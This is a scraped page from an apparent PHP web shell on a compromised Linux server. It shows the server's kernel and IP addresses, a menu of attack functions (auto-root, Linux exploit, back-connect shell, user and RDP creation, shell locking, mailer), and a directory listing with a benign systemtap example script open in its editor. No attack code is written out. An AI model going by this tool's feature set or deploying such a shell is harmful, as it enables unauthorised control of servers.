Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
network /
[ HOME SHELL ]
Name
Size
Permission
Action
autofs4.meta
397
B
-rw-r--r--
autofs4.stp
4.07
KB
-rwxr-xr-x
connect_stat.meta
404
B
-rw-r--r--
connect_stat.stp
1019
B
-rwxr-xr-x
dropwatch.meta
494
B
-rw-r--r--
dropwatch.stp
871
B
-rwxr-xr-x
net_xmit_json.meta
453
B
-rw-r--r--
net_xmit_json.stp
1.76
KB
-rw-r--r--
netdev.meta
389
B
-rw-r--r--
netdev.stp
1.42
KB
-rwxr-xr-x
netfilter_drop.meta
630
B
-rw-r--r--
netfilter_drop.stp
1.13
KB
-rwxr-xr-x
netfilter_summary.meta
587
B
-rw-r--r--
netfilter_summary.stp
591
B
-rwxr-xr-x
netfilter_summary.txt
2.81
KB
-rw-r--r--
netfilter_summary_json.meta
511
B
-rw-r--r--
netfilter_summary_json.stp
1.04
KB
-rw-r--r--
nettop.meta
519
B
-rw-r--r--
nettop.stp
1.12
KB
-rwxr-xr-x
nettop.txt
953
B
-rw-r--r--
nfsd-recent.meta
423
B
-rw-r--r--
nfsd-recent.stp
442
B
-rwxr-xr-x
nfsd-trace.meta
314
B
-rw-r--r--
nfsd-trace.stp
701
B
-rw-r--r--
nfsd-trace.txt
876
B
-rw-r--r--
nfsd_unlink.meta
479
B
-rw-r--r--
nfsd_unlink.stp
523
B
-rwxr-xr-x
nfsdtop.meta
405
B
-rw-r--r--
nfsdtop.stp
3.31
KB
-rwxr-xr-x
packet_contents.meta
550
B
-rw-r--r--
packet_contents.stp
216
B
-rwxr-xr-x
packet_contents.txt
2.02
KB
-rw-r--r--
sk_stream_wait_memory.meta
616
B
-rw-r--r--
sk_stream_wait_memory.stp
999
B
-rwxr-xr-x
socket-trace.meta
702
B
-rw-r--r--
socket-trace.stp
222
B
-rwxr-xr-x
socktop
8.93
KB
-rwxr-xr-x
socktop.meta
548
B
-rw-r--r--
socktop.txt
4.04
KB
-rw-r--r--
stp_dump.meta
339
B
-rw-r--r--
stp_dump.stp
568
B
-rw-r--r--
stp_dump.txt
1.59
KB
-rw-r--r--
tcp_connections.meta
625
B
-rw-r--r--
tcp_connections.stp
361
B
-rwxr-xr-x
tcp_init_cwnd.meta
589
B
-rw-r--r--
tcp_init_cwnd.stp
343
B
-rwxr-xr-x
tcp_retransmission.meta
286
B
-rw-r--r--
tcp_retransmission.stp
1.15
KB
-rw-r--r--
tcp_trace.meta
684
B
-rw-r--r--
tcp_trace.stp
18.36
KB
-rwxr-xr-x
tcp_trace.txt
3.38
KB
-rw-r--r--
tcpdumplike.meta
381
B
-rw-r--r--
tcpdumplike.stp
581
B
-rwxr-xr-x
tcpipstat.meta
725
B
-rw-r--r--
tcpipstat.stp
17.82
KB
-rwxr-xr-x
tcpipstat.txt
898
B
-rw-r--r--
who_sent_it.meta
583
B
-rw-r--r--
who_sent_it.stp
477
B
-rw-r--r--
who_sent_it.txt
803
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : connect_stat.stp
#!/usr/bin/stap ############################################################ # connect_stat.stp # Author: Robin Hack <rhack@redhat.com> # An example script show process tree of process # which tried to call connect with specific ip address ############################################################ function process_tree (ip:string) { cur_proc = task_current(); parent_pid = task_pid(task_parent (cur_proc)); printf ("%s: ", ip); while (parent_pid != 0) { printf ("%s (%d),%d,%d -> ", task_execname(cur_proc), task_pid(cur_proc), task_uid(cur_proc),task_gid (cur_proc)); cur_proc = task_parent(cur_proc); parent_pid = task_pid(task_parent (cur_proc)); } # init process if (task_pid (cur_proc) == 1) { printf ("%s (%d),%d,%d\n", task_execname(cur_proc), task_pid(cur_proc), task_uid(cur_proc),task_gid (cur_proc)); } } probe syscall.connect { if ((uaddr_af !~ "AF_INET*") || (uaddr_ip != @1)) { next; } process_tree (uaddr_ip); }
Close